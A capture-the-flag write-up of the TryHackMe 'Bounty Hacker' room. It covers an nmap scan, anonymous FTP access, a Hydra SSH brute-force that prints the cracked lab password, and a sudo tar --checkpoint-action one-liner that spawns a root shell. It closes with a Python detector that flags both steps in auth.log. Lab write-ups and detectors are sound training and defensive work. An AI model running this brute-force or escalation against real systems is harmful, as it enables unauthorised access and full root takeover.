[THM] Bounty Hacker

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

Link to the room

Overview

Inside an FTP server there is a username and a wordlist with which to brute-force the SSH service.

To escalate privileges, it is found that the user can execute tar as root.

[Task 1] Living up to the title.

$ nmap -sC -sV -T4 10.10.89.249
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 21:41 CEST
Nmap scan report for 10.10.89.249
Host is up (0.092s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.17.97
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.41 seconds

First of all I enumerate the machine and see that anonymous login is allowed on FTP, so I log in and download both files that I find.

#3 Who wrote the task list?

One file is a wordlist and the other is a note signed by a certain lin.

lin

#4 What service can you bruteforce with the text file found?

ssh

#5 What is the user's password?

Having the wordlist, you only need to crack the password:

$ hydra -l lin -P fuzzy-octo-guacamole/pentest/tryhackme/bounty_hacker/locks.txt 10.10.89.249 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-20 21:44:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.89.249:22/
[22][ssh] host: 10.10.89.249 login: lin password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-20 21:44:41
lin:RedDr4gonSynd1cat3

#6 user.txt

THM{***************}

#7 root.txt

The next step I take, before doing a complete enumeration of the machine, is to try sudo -l, and I see that I can run the tar command as root.

This command allows us to escalate privileges in a very simple way: tar's --checkpoint-action option runs an arbitrary program at each checkpoint, and since tar itself runs as root, so does the shell it spawns.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

And that's it, we are root.
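As an added example that is not part of the original writeup, here is a small defender-side check covering both steps above. It reads constructed auth.log lines (hostname, PIDs and the 10.0.0.5 address are placeholders I made up) and flags the two things this room relies on: a burst of failed SSH password attempts from one address, as Hydra produces, and a sudo invocation of tar carrying --checkpoint-action.

```python
import re
from collections import Counter

# Constructed sample /var/log/auth.log lines (not captured from the room).
SAMPLE_AUTH_LOG = """\
Aug 20 21:44:31 bountyhacker sshd[1201]: Failed password for lin from 10.0.0.5 port 40001 ssh2
Aug 20 21:44:31 bountyhacker sshd[1202]: Failed password for lin from 10.0.0.5 port 40002 ssh2
Aug 20 21:44:32 bountyhacker sshd[1203]: Failed password for lin from 10.0.0.5 port 40003 ssh2
Aug 20 21:44:32 bountyhacker sshd[1204]: Failed password for lin from 10.0.0.5 port 40004 ssh2
Aug 20 21:44:33 bountyhacker sshd[1205]: Failed password for lin from 10.0.0.5 port 40005 ssh2
Aug 20 21:44:33 bountyhacker sshd[1206]: Accepted password for lin from 10.0.0.5 port 40006 ssh2
Aug 20 21:45:10 bountyhacker sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
Aug 20 21:50:00 bountyhacker sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/bin/tar -cf /tmp/backup.tar /home/lin/Desktop
"""

# sshd failure line: capture the user being tried and the source address
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
# sudo audit line: capture invoking user, target user and the full command
SUDO_RE = re.compile(r"sudo:\s+(\S+) : .*?USER=(\S+) ; COMMAND=(.*)$")
# the tar option used in this room to run a program from inside tar
TAR_EXEC_OPT = "--checkpoint-action"


def detect(log_text, threshold=5):
    """Return a list of (alert_type, subject, detail) tuples for the given log text."""
    failures = Counter()
    alerts = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[(m.group(2), m.group(1))] += 1  # key: (source ip, username)
            continue
        m = SUDO_RE.search(line)
        if m:
            user, target, cmd = m.groups()
            argv = cmd.split()
            # legitimate backups (second sudo line) do not carry the exec option
            if argv and argv[0].endswith("/tar") and target == "root":
                if any(a.split("=")[0] == TAR_EXEC_OPT for a in argv[1:]):
                    alerts.append(("sudo_tar_exec", user, cmd))
    for (ip, user), n in failures.items():
        if n >= threshold:
            alerts.append(("ssh_bruteforce", ip, f"{n} failed logins for {user}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG):
        print(alert)
```

The threshold is low so the constructed sample trips it; on a real host the sudo rule alone is the higher-signal one, and the brute-force rule is better paired with a time window than a flat count.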

THM{***********}

Computer Science student. Capture the flag player.